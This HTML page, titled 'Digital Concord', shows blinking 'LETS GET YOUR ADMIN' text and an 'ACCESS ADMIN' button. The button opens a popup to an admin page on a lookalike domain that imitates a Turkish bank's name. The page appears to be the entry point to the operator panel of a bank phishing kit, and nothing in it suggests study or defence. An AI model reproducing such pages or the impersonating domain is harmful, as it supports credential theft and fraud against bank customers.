
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Welcome - Digital Concord</title>
<style>

#myDiv {
  display: none;
  text-align: center;
}

  .blink {
        animation: blinker 0.6s linear infinite;
        color: #FFFFFF;
        font-size: 15px;
        font-weight: bold;
        font-family: sans-serif;
        text-align: center;
      }
      @keyframes blinker {
        50% {
          opacity: 0;
        }
      }

  .blink-two {
        animation: blinker-two 1.4s linear infinite;
      }
      @keyframes blinker-two {
        100% {
          opacity: 0;
        }
      }

.auto-style1 {
	font-family: "Clarendon Blk BT";
	font-size: xx-large;
	text-align: center;
	color:#FFFFFF;
}

</style>
<style type="text/css">
body {
	background-image: url(/images/fremont_bg_newapp-skinner.jpg);
}
</style>
</head>
<body onload="myFunction()" style="margin:0;">




<div>
<p class="auto-style1">&nbsp;</p>
	
	<p class="auto-style3"> DIGITAL CONCORD</p>
<p class="blink blink-two">LETS GET YOUR ADMIN.....</p>
</div>


<style type="text/css">
.auto-style1 {
	text-align: center;
}
.auto-style2 {
	text-align: center;
}
.auto-style3 {
	font-family: "Bernard MT Condensed";
	font-size: xx-large;
	color: #4B426F;
}
</style>

<p class="auto-style1"><br>
<img alt="" height="187" src="/images/clickhere.gif" width="141"></p>

<p class="auto-style2">
<a target="popup">
<strong>
<button class="popup" style="height: 36px; width: 200px" onclick="window.open('https://turkiyehalkbkasi.bnkingportal.cf/secured/admin.html','popup','width=1200,height=600,scrollbars=no,resizable=no'); return false;">
ACCESS ADMIN
</button>
</strong>
</a> 
</p>
</body>
</html>
